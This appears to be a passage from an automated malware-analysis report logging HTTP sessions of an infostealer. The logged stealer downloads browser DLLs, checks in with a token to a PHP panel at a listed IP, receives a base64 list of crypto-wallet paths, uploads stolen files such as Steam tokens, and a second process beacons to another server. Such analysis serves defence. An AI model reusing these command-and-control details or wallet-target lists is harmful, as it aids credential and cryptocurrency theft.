mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 3, 2024 17:13:45.417026997 CEST	93	OUT	GET /3836fd5700214436/mozglue.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:45.654438972 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 3, 2024 17:13:46.131414890 CEST	94	OUT	GET /3836fd5700214436/msvcp140.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:46.361047029 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:46 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 3, 2024 17:13:46.712508917 CEST	90	OUT	GET /3836fd5700214436/nss3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:46.945010900 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:46 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 3, 2024 17:13:48.582854033 CEST	94	OUT	GET /3836fd5700214436/softokn3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:48.819433928 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 3, 2024 17:13:49.124386072 CEST	98	OUT	GET /3836fd5700214436/vcruntime140.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 3, 2024 17:13:49.351080894 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:49 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 3, 2024 17:13:50.016628027 CEST	202	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB Host: 91.202.233.158 Content-Length: 1003 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:50.258974075 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:50.802870989 CEST	468	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG Host: 91.202.233.158 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="message"wallets------CBKFIECBGDHJKECAKFBG--
Sep 3, 2024 17:13:51.036150932 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:50 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 3, 2024 17:13:51.114717960 CEST	466	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHI Host: 91.202.233.158 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="message"files------KKJKFBKKECFHJKEBKEHI--
Sep 3, 2024 17:13:51.343585968 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:51.473145962 CEST	564	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJ Host: 91.202.233.158 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="file"------EGDGDHJJDGHCAAAKEHIJ--
Sep 3, 2024 17:13:51.711289883 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:51.855801105 CEST	204	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJ Host: 91.202.233.158 Content-Length: 119359 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:52.386013031 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:53.620697021 CEST	473	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB Host: 91.202.233.158 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 2d 2d 0d 0a Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="message"ybncbhylepme------IDHIDBAEGIIIDHJKEGDB--
Sep 3, 2024 17:13:53.850614071 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:53.851890087 CEST	473	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID Host: 91.202.233.158 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKECFCFBGDHIECAAFIID--
Sep 3, 2024 17:13:54.087851048 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49752	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:37.275573969 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:38.100064039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:38.100860119 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:38.368735075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49753	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:38.493310928 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
